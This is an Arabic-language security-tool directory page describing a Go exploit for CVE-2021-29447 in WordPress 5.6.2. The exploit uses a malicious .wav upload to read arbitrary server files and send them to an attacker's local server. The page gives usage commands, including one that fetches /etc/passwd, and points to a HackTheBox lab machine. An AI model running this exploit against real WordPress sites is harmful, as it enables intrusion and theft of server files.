Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
exploit_cve-2021-29447 — استغلال قائم على Go لـ CVE-2021-29447 يستهدف WordPress 5.6.2 مع PHP 8. يولد حمولة .wav خبيثة لاسترداد ملفات عشوائية من الخادم عبر رفع الوسائط، ويتطلب وصول wp-admin أساسي. | Kitploit
أدوات/GitHubGitHub/mega8bit/exploit_cve-2021-29447
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmega8bit/exploit_cve-2021-29447

exploit_cve-2021-29447

استغلال قائم على Go لـ CVE-2021-29447 يستهدف WordPress 5.6.2 مع PHP 8. يولد حمولة .wav خبيثة لاسترداد ملفات عشوائية من الخادم عبر رفع الوسائط، ويتطلب وصول wp-admin أساسي.

عرض المستودع
71منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

exploit_cve-2021-29447

لأغراض تعليمية فقط.

من المفترض أن تكون هذه الأداة أداة مريحة حقاً للحصول على أي ملف من خادم يعمل بنظام WordPress 5.6.2 و php8. (انظر https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)

كل ما تحتاجه هو وصول أساسي إلى wp-admin والقدرة على رفع ملف وسائط.

سيقوم الاستغلال بتوليد حمولة ملف .wav لرفعها باستخدام wp-admin.

ثم يستخدم الخادم الخلفي الخاص بالاستغلال ليمنحك الملف المطلوب مباشرة على وحدة التحكم الخاصة بك.

الاستخدام الأمثل هو جهاز HackTheBox - metatwo https://www.hackthebox.com/machines/metatwo

til

الاستخدام/أمثلة

root@kitploit:~
$ go build

$ chmod +x exploit_cve-2021-29447

$ ./exploit_cve-2021-29447 --help                                               
Usage of ./exploit_cve-2021-29447:
  -local-server-ip string
        Use local server ip where a local server will be set
  -local-server-port int
        Use local server port to run local server on
  -o string
        Output file to save exploit's result
  -target-path string
        Use target path to point on file you want to get from target server

$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd

تنزيل الأداة